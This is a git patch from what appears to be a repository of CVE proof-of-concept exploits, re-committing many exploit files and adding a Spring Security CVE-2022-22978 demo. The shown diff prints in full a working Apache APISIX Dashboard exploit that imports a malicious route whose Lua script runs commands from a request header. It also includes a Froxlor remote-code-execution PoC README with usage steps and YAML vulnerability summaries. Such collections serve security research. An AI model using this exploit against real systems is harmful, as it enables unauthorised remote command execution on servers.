From ebf0faddd7ad214386a35141c6bedd782aad114c Mon Sep 17 00:00:00 2001
From: zhangqichen131 <qcZhang@buaa.edu.com>
Date: Thu, 6 Apr 2023 17:35:37 +0800
Subject: [PATCH 1/2] 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/.gitignore 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties
 	new file:   cve/java-spring-security/2022/CVE-2022-22978/Dockerfile 
 new file:   cve/java-spring-security/2022/CVE-2022-22978/README.md 	new
 file:   cve/java-spring-security/2022/CVE-2022-22978/img.png 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/img_1.png 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/mvnw 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/pom.xml 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java
 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java
 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java
 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java
 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties
 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html
 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html
 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java
 	new file:  
 cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java
 	new file:   cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml 
 modified:   other_list.yaml

---
 .../cve-2021-45232/apisix_dashboard_rce.py    |  184 +-
 .../2021/yaml/ cve-2021-45232.yaml            |   42 +-
 cve/Froxlor/2023/CVE-2023-0315/README.md      |   56 +-
 cve/Froxlor/2023/yaml/CVE-2023-0315.yaml      |   42 +-
 cve/Node.JS/2021/yaml/CVE-2023-1355.yaml      |   42 +-
 cve/Outlook/2023/yaml/CVE-2023-23397.yaml     |   36 +-
 .../CVE-2022-24706/CVE-2022-24706-Exploit.py  |  270 +--
 .../2022/CVE-2022-24706/README.md             |   50 +-
 .../2022/yaml/CVE-2022-24706.yaml             |   62 +-
 .../DubboProtocolExploit/pom.xml              |  120 +-
 .../main/java/DubboProtocolExploit/Main.java  |  314 ++--
 .../main/java/DubboProtocolExploit/Utils.java |  440 ++---
 .../org/apache/dubbo/demo/DemoService.java    |   10 +-
 .../2021/CVE-2021-43297/ExecTest.java         |   14 +-
 .../2021/CVE-2021-43297/HTTPServer.java       |  212 +--
 .../2021/CVE-2021-43297/HessianLitePoc.java   |  264 +--
 .../2021/CVE-2021-43297/README.md             |    8 +-
 .../2021/yaml/CVE-2021-25641.yaml             |   38 +-
 .../2021/yaml/CVE-2021-43297.yaml             |   38 +-
 .../2020/CVE-2020-17518/CVE-2020-17518.py     |   60 +-
 .../2019/CVE-2019-0230/CVE-2019-0230.py       |  324 ++--
 .../2019/CVE-2019-0230/README.md              |   40 +-
 .../2019/yaml/CVE-2019-0230.yaml              |   48 +-
 .../2020/CVE-2020-13932/poc.py                |   44 +-
 .../2020/yaml/CVE-2020-13932.yaml             |   40 +-
 .../2022/yaml/CVE-2022-42889.yaml             |   38 +-
 cve/apache-log4j/2021/CVE-2021-44228/poc.py   |    0
 .../2019/CVE-2019-0193/CVE-2019-0193.py       |  180 +-
 cve/apache-solr/2019/CVE-2019-0193/README.md  |   16 +-
 cve/apache-solr/2019/yaml/CVE-2019-0193.yaml  |   80 +-
 .../2020/CVE-2020-13935/.gitignore            |    0
 cve/apache-tomcat/2020/CVE-2020-13935/LICENSE |    0
 .../2020/CVE-2020-13935/README.md             |    0
 cve/apache-tomcat/2020/CVE-2020-13935/go.mod  |    0
 cve/apache-tomcat/2020/CVE-2020-13935/go.sum  |    0
 cve/apache-tomcat/2020/CVE-2020-13935/main.go |    0
 .../2022/CVE-2022-29885/CVE-2022-29885.go     |    0
 .../2022/CVE-2022-29885/README.md             |    0
 cve/docker/2023/yaml/CVE-2022-37708.yaml      |   44 +-
 cve/gitlab/2020/yaml/CVE-2020-10977.yaml      |   38 +-
 cve/gitlab/2022/CVE-2022-2992/README.md       |  194 +--
 cve/gitlab/2022/CVE-2022-2992/exploit.py      |  104 +-
 cve/gitlab/2022/CVE-2022-2992/payload_gen.rb  |   98 +-
 cve/gitlab/2022/CVE-2022-2992/server.py       |  184 +-
 cve/gitlab/2022/yaml/CVE-2022-2992.yaml       |   52 +-
 .../2022/CVE-2022-0265/CVE-2022-0265.py       |   64 +-
 .../2022/CVE-2022-22947/README.md             |   86 +-
 .../2022/CVE-2022-22947/exploit.py            |  150 +-
 .../2022/yaml/CVE-2022-22947.yaml             |   42 +-
 .../2022/CVE-2022-22978/.gitignore            |   58 +
 .../.mvn/wrapper/maven-wrapper.properties     |    2 +
 .../2022/CVE-2022-22978/Dockerfile            |    5 +
 .../2022/CVE-2022-22978/README.md             |   12 +
 .../2022/CVE-2022-22978/img.png               |  Bin 0 -> 41580 bytes
 .../2022/CVE-2022-22978/img_1.png             |  Bin 0 -> 40601 bytes
 .../2022/CVE-2022-22978/mvnw                  |  316 ++++
 .../2022/CVE-2022-22978/mvnw.cmd              |  188 +++
 .../2022/CVE-2022-22978/pom.xml               |   68 +
 .../saferoad/config/SpringSecurityConfig.java |   16 +
 .../java/cc/saferoad/controller/Demo.java     |   21 +
 .../cve202222978/Cve202222978Application.java |   13 +
 .../cve202222978/ServletInitializer.java      |   15 +
 .../src/main/resources/application.properties |    1 +
 .../src/main/resources/templates/index.html   |   14 +
 .../src/main/resources/templates/manage.html  |   10 +
 .../Cve202222978ApplicationTests.java         |   13 +
 .../RegexRequestMatcherTests.java             |   17 +
 .../2022/yaml/CVE-2022-22978.yaml             |   22 +
 .../2022/CVE-2022-22963/CVE-2022-22963-POC.py |  116 +-
 cve/java-spring/2022/CVE-2022-22963/README.md |   18 +-
 cve/java-spring/2022/yaml/CVE-2022-22963.yaml |   40 +-
 .../2021/CVE-2021-42008/README.md             |   58 +-
 .../2021/CVE-2021-43267/exploit.c             | 1496 ++++++++---------
 cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml |   38 +-
 .../2021/yaml/CVE-2021-42008.yaml             |   40 +-
 .../2021/yaml/CVE-2021-42327.yaml             |   44 +-
 .../2021/yaml/CVE-2021-43267.yaml             |   42 +-
 cve/linux-kernel/2022/CVE-2022-0185/Makefile  |    2 +-
 cve/linux-kernel/2022/CVE-2022-0185/README.md |   20 +-
 .../2022/CVE-2022-0847/compile.sh             |    0
 .../2022/CVE-2022-25636/README.md             |   56 +-
 .../2022/CVE-2022-2588/exp_file_credential    |  Bin
 .../2022/CVE-2022-27666/README.md             |   32 +-
 .../2022/CVE-2022-27666/compile.sh            |    0
 .../2022/CVE-2022-27666/download_symbol.sh    |    0
 cve/linux-kernel/2022/CVE-2022-27666/run.sh   |    0
 .../2022/yaml/ CVE-2022-36946.yaml            |   34 +-
 cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml |   44 +-
 cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml |   56 +-
 .../2022/yaml/CVE-2022-32250.yaml             |   36 +-
 cve/linux-kernel/2023/CVE-2023-0179/Makefile  |   24 +-
 cve/linux-kernel/2023/CVE-2023-0179/helpers.c |  788 ++++-----
 cve/linux-kernel/2023/CVE-2023-0179/helpers.h |  118 +-
 cve/linux-kernel/2023/CVE-2023-0179/needle.c  |  282 ++--
 cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml |   44 +-
 cve/nvidia/2021/CVE-2021-1056/README.md       |  324 ++--
 cve/nvidia/2021/CVE-2021-1056/main.sh         |   82 +-
 .../2021/CVE-2021-1056/tf_distr_demo.py       |  210 +--
 cve/nvidia/2021/CVE-2021-1056/util.sh         |   24 +-
 cve/nvidia/2021/yaml/CVE-2021-1056.yaml       |   44 +-
 cve/openssl/2022/CVE-2022-0778/bad_BN.c       |   42 +-
 cve/openssl/2022/yaml/CVE-2022-3786.yaml      |   36 +-
 cve/polkit/2021/CVE-2021-4115/CMakeLists.txt  |   60 +-
 cve/polkit/2021/CVE-2021-4115/README.md       |  104 +-
 .../2021/CVE-2021-4115/locksessions.cpp       |  222 +--
 cve/polkit/2021/yaml/CVE-2021-4115.yaml       |   44 +-
 .../2022/CVE-2022-30286/CVE-2022-30286.txt    |   34 +-
 cve/python/2022/CVE-2022-30286/README.md      |   48 +-
 .../2022/CVE-2022-35411/CVE-2022-35411.py     |  102 +-
 cve/python/2022/CVE-2022-35411/README.md      |   34 +-
 cve/python/2022/yaml/CVE-2022-30286.yaml      |   46 +-
 cve/python/2022/yaml/CVE-2022-35411.yaml      |   44 +-
 cve/redis/2022/yaml/CVE-2022-31144.yaml       |   46 +-
 cve/sudo/2019/CVE-2019-18634/.gitignore       |    0
 cve/sudo/2019/CVE-2019-18634/LICENSE          |    0
 cve/sudo/2019/CVE-2019-18634/Makefile         |    0
 cve/sudo/2019/CVE-2019-18634/README.md        |    0
 cve/sudo/2019/CVE-2019-18634/exploit.c        |    0
 cve/sudo/2019/yaml/CVE-2019-14287.yaml        |   40 +-
 cve/sudo/2023/yaml/CVE-2023-22809.yaml        |   38 +-
 cve/unzip/2022/yaml/CVE-2022-0529.yaml        |   36 +-
 cve/vim/2021/CVE-2021-3778/other_poc.txt      |   10 +-
 cve/vim/2021/CVE-2021-3778/readme.md          |   20 +-
 cve/vim/2021/yaml/CVE-2021-3778.yaml          |   42 +-
 cve/vim/2023/CVE-2023-0288/readme.md          |  200 +--
 .../\346\274\217\346\264\236CVE-2023-0512.md" |  214 +--
 cve/vim/2023/CVE-2023-1175/README.md          |  268 +--
 cve/vim/2023/CVE-2023-1264/README.md          |  214 +--
 cve/vim/2023/yaml/CVE-2023-0288.yaml          |   36 +-
 cve/vim/2023/yaml/CVE-2023-0512.yaml          |   36 +-
 cve/vim/2023/yaml/CVE-2023-1264.yaml          |   38 +-
 cve/weblogic/2020/yaml/CVE-2020-14882.yaml    |   44 +-
 cve/webmin/2022/CVE-2022-0824/README.md       |  116 +-
 .../2022/CVE-2022-0824/Webmin-revshell.py     |  290 ++--
 cve/webmin/2022/yaml/CVE-2022-0824.yaml       |   38 +-
 .../2022/CVE-2022-23131/CVE-2022-23131.py     |   72 +-
 cve/zabbix/2022/CVE-2022-23131/README.md      |    8 +-
 cve/zabbix/2022/yaml/CVE-2022-23131.yaml      |   20 -
 other_list.yaml                               |    2 +
 139 files changed, 6244 insertions(+), 5471 deletions(-)
 mode change 100755 => 100644 cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py
 mode change 100755 => 100644 cve/apache-log4j/2021/CVE-2021-44228/poc.py
 mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/.gitignore
 mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/LICENSE
 mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/README.md
 mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/go.mod
 mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/go.sum
 mode change 100755 => 100644 cve/apache-tomcat/2020/CVE-2020-13935/main.go
 mode change 100755 => 100644 cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go
 mode change 100755 => 100644 cve/apache-tomcat/2022/CVE-2022-29885/README.md
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/.gitignore
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/Dockerfile
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/README.md
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/img.png
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/img_1.png
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/mvnw
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/pom.xml
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java
 create mode 100644 cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java
 create mode 100644 cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml
 mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-0847/compile.sh
 mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential
 mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-27666/compile.sh
 mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh
 mode change 100755 => 100644 cve/linux-kernel/2022/CVE-2022-27666/run.sh
 mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/.gitignore
 mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/LICENSE
 mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/Makefile
 mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/README.md
 mode change 100755 => 100644 cve/sudo/2019/CVE-2019-18634/exploit.c
 mode change 100755 => 100644 cve/webmin/2022/CVE-2022-0824/README.md
 mode change 100755 => 100644 cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py
 mode change 100755 => 100644 cve/webmin/2022/yaml/CVE-2022-0824.yaml
 delete mode 100644 cve/zabbix/2022/yaml/CVE-2022-23131.yaml 

diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
index edd12c9f..30ebcda5 100644
--- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
+++ b/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py
@@ -1,93 +1,93 @@
-#!/usr/bin/env python3
-import zlib
-import json
-import random
-import requests
-import string
-import sys
-from urllib3.exceptions import InsecureRequestWarning
-
-# Suppress only the single warning from urllib3 needed.
-requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
-
-
-eval_config = {
-    "Counsumers": [],
-    "Routes": [
-        {
-            "id": str(random.randint(100000000000000000, 1000000000000000000)),
-            "create_time": 1640674554,
-            "update_time": 1640677637,
-            "uris": [
-                "/rce"
-            ],
-            "name": "rce",
-            "methods": [
-                "GET",
-                "POST",
-                "PUT",
-                "DELETE",
-                "PATCH",
-                "HEAD",
-                "OPTIONS",
-                "CONNECT",
-                "TRACE"
-            ],
-            "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
-            "status": 1
-        }
-    ],
-    "Services": [],
-    "SSLs": [],
-    "Upstreams": [],
-    "Scripts": [],
-    "GlobalPlugins": [],
-    "PluginConfigs": []
-}
-
-
-def random_str():
-    return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
-
-
-def calc_crc(data):
-    crc32 = zlib.crc32(data) & 0xffffffff
-    return crc32.to_bytes(4, byteorder="big")
-
-
-def export_data(url):
-    r = requests.get(url + "/apisix/admin/migrate/export", verify=False)
-    return r.text[:-4]
-
-
-def import_data(url, data):
-    data = json.dumps(data).encode()
-    crc32 = calc_crc(data)
-
-    files = {"file": ("data", data + crc32, "text/data")}
-    resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False)
-    # print(resp.text)
-    if resp.json().get("code", -1) == 0:
-        return True
-    else:
-        return False
-
-
-if __name__ == "__main__":
-    if len(sys.argv) != 2:
-        print("python " + sys.argv[0] + " http://127.0.0.1:9000")
-        exit()
-    
-    url = sys.argv[1]
-    if url.endswith("/"):
-        url = url[:-1]
-
-    uri = random_str()
-    eval_config["Routes"][0]["uris"] = [ "/" + uri]
-    eval_config["Routes"][0]["name"] = uri
-
-    if import_data(url, eval_config):
-        print("attack success")
-        print("uri is: " + "/" + uri)
-    else:
+#!/usr/bin/env python3
+import zlib
+import json
+import random
+import requests
+import string
+import sys
+from urllib3.exceptions import InsecureRequestWarning
+
+# Suppress only the single warning from urllib3 needed.
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+
+eval_config = {
+    "Counsumers": [],
+    "Routes": [
+        {
+            "id": str(random.randint(100000000000000000, 1000000000000000000)),
+            "create_time": 1640674554,
+            "update_time": 1640677637,
+            "uris": [
+                "/rce"
+            ],
+            "name": "rce",
+            "methods": [
+                "GET",
+                "POST",
+                "PUT",
+                "DELETE",
+                "PATCH",
+                "HEAD",
+                "OPTIONS",
+                "CONNECT",
+                "TRACE"
+            ],
+            "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
+            "status": 1
+        }
+    ],
+    "Services": [],
+    "SSLs": [],
+    "Upstreams": [],
+    "Scripts": [],
+    "GlobalPlugins": [],
+    "PluginConfigs": []
+}
+
+
+def random_str():
+    return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
+
+
+def calc_crc(data):
+    crc32 = zlib.crc32(data) & 0xffffffff
+    return crc32.to_bytes(4, byteorder="big")
+
+
+def export_data(url):
+    r = requests.get(url + "/apisix/admin/migrate/export", verify=False)
+    return r.text[:-4]
+
+
+def import_data(url, data):
+    data = json.dumps(data).encode()
+    crc32 = calc_crc(data)
+
+    files = {"file": ("data", data + crc32, "text/data")}
+    resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False)
+    # print(resp.text)
+    if resp.json().get("code", -1) == 0:
+        return True
+    else:
+        return False
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 2:
+        print("python " + sys.argv[0] + " http://127.0.0.1:9000")
+        exit()
+    
+    url = sys.argv[1]
+    if url.endswith("/"):
+        url = url[:-1]
+
+    uri = random_str()
+    eval_config["Routes"][0]["uris"] = [ "/" + uri]
+    eval_config["Routes"][0]["name"] = uri
+
+    if import_data(url, eval_config):
+        print("attack success")
+        print("uri is: " + "/" + uri)
+    else:
         print("attack error")
\ No newline at end of file
diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml
index ad102017..3041c776 100644
--- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml	
+++ b/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml	
@@ -1,22 +1,22 @@
-id:  CVE-2021-45232
-source: https://github.com/wuppp/cve-2021-45232-exp
-info:
-  name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
-  severity: CRITICAL
-  description:
-    CVE-2021-45232 中，攻击者可构造恶意请求，获取到 apisix 的配置文件信息，或者利用其他接口导入恶意配置，利用APISIX Script功能从而执行任意命令。
-  scope-of-influence:
-    In Apache APISIX Dashboard before 2.10.1
-  reference:
-    - http://www.openwall.com/lists/oss-security/2021/12/27/1	
-    - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232	
-    - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5	
-    - https://seclists.org/oss-sec/2021/q4/180
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2021-45232
-    cwe-id: CWE-306
-    cnvd-id: None
-    kve-id: None
+id:  CVE-2021-45232
+source: https://github.com/wuppp/cve-2021-45232-exp
+info:
+  name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。
+  severity: CRITICAL
+  description:
+    CVE-2021-45232 中，攻击者可构造恶意请求，获取到 apisix 的配置文件信息，或者利用其他接口导入恶意配置，利用APISIX Script功能从而执行任意命令。
+  scope-of-influence:
+    In Apache APISIX Dashboard before 2.10.1
+  reference:
+    - http://www.openwall.com/lists/oss-security/2021/12/27/1	
+    - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232	
+    - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5	
+    - https://seclists.org/oss-sec/2021/q4/180
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-45232
+    cwe-id: CWE-306
+    cnvd-id: None
+    kve-id: None
   tags: cve2021
\ No newline at end of file
diff --git a/cve/Froxlor/2023/CVE-2023-0315/README.md b/cve/Froxlor/2023/CVE-2023-0315/README.md
index d0fe71ba..cfd00af2 100644
--- a/cve/Froxlor/2023/CVE-2023-0315/README.md
+++ b/cve/Froxlor/2023/CVE-2023-0315/README.md
@@ -1,28 +1,28 @@
-# CVE-2023-0315 Proof-of-Concept
-### Overview
-This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
-It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
-An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
-For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
-
-### Dependencies
-* Froxlor 2.0.3 Stable 
-* Python 3.8+
-* `requests` Python Library
-* `beautifulsoup4` Python Library
-* Ubuntu 20.04 
-* PHP 8.2
-### Usage
-
-1.Verify the required libraries are installed:
-```
-pip install requests beautifulsoup4
-```
-2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
-
-3.Run the PoC:
-```
-python cve-2023-0315.py
-```
-### Additional Information
-This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
+# CVE-2023-0315 Proof-of-Concept
+### Overview
+This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
+It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
+An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
+For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
+
+### Dependencies
+* Froxlor 2.0.3 Stable 
+* Python 3.8+
+* `requests` Python Library
+* `beautifulsoup4` Python Library
+* Ubuntu 20.04 
+* PHP 8.2
+### Usage
+
+1.Verify the required libraries are installed:
+```
+pip install requests beautifulsoup4
+```
+2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
+
+3.Run the PoC:
+```
+python cve-2023-0315.py
+```
+### Additional Information
+This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
index 5823536a..d0b9db0d 100644
--- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
+++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
@@ -1,21 +1,21 @@
-id: CVE-2023-0315
-source:
-  https://github.com/mhaskar/CVE-2023-0315
-info:
-  name: Froxlor是一款易于使用且功能强大的服务器管理面板，用于管理各种主机和域名服务。
-  severity: high
-  description: |
-    Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
-  scope-of-influence:
-    Froxlor 2.0.8 之前的版本
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
-    - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
-    cve-id: CVE-2023-0315
-    cwe-id: CWE-77
-    cnvd-id: None
-    kve-id: None
-  tags: 远程代码执行, RCE
+id: CVE-2023-0315
+source:
+  https://github.com/mhaskar/CVE-2023-0315
+info:
+  name: Froxlor是一款易于使用且功能强大的服务器管理面板，用于管理各种主机和域名服务。
+  severity: high
+  description: |
+    Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
+  scope-of-influence:
+    Froxlor 2.0.8 之前的版本
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
+    - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2023-0315
+    cwe-id: CWE-77
+    cnvd-id: None
+    kve-id: None
+  tags: 远程代码执行, RCE
diff --git a/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml b/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
index e4ffd901..a0a833e0 100644
--- a/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
+++ b/cve/Node.JS/2021/yaml/CVE-2023-1355.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-21315
-source: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
-info:
-  name:  Node.js是一个基于Chrome V8引擎的JavaScript运行环境，用于方便的搭建响应速度快、易于拓展的网络应用。
-  severity: HIGH
-  description: |
-    Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中，攻击者可以通过未过滤的参数中注入payload执行系统命令。
-  scope-of-influence:
-    Node.js-systeminformation<5.3.1
-  reference:
-    - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
-    - https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525
-    - https://security.netapp.com/advisory/ntap-20210312-0007/
-    - https://www.npmjs.com/package/systeminformation
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.8
-    cve-id: CVE-2021-21315
-    cwe-id: CWE-78
-    cnvd-id: None
-    kve-id: None
+id: CVE-2021-21315
+source: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
+info:
+  name:  Node.js是一个基于Chrome V8引擎的JavaScript运行环境，用于方便的搭建响应速度快、易于拓展的网络应用。
+  severity: HIGH
+  description: |
+    Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中，攻击者可以通过未过滤的参数中注入payload执行系统命令。
+  scope-of-influence:
+    Node.js-systeminformation<5.3.1
+  reference:
+    - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
+    - https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525
+    - https://security.netapp.com/advisory/ntap-20210312-0007/
+    - https://www.npmjs.com/package/systeminformation
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2021-21315
+    cwe-id: CWE-78
+    cnvd-id: None
+    kve-id: None
   tags: cve2021, 系统入侵
\ No newline at end of file
diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
index 11f0fd08..497f08e0 100644
--- a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
+++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
@@ -1,19 +1,19 @@
-id: CVE-2023-23397
-source: https://github.com/Trackflaw/CVE-2023-23397
-info:
-  name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制，攻击者能够强制受害者连接到其服务器，而无需用户进行任何操作（零点击漏洞）。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱，请求就会被触发。
-  severity: critical
-  description: |
-    Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
-  scope-of-influence:
-    outlook-2013, outlook-2016, outlook-2019
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-23397
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2023-23397
-    cwe-id:  CWE-294
-    cnvd-id: None
-    kve-id: None
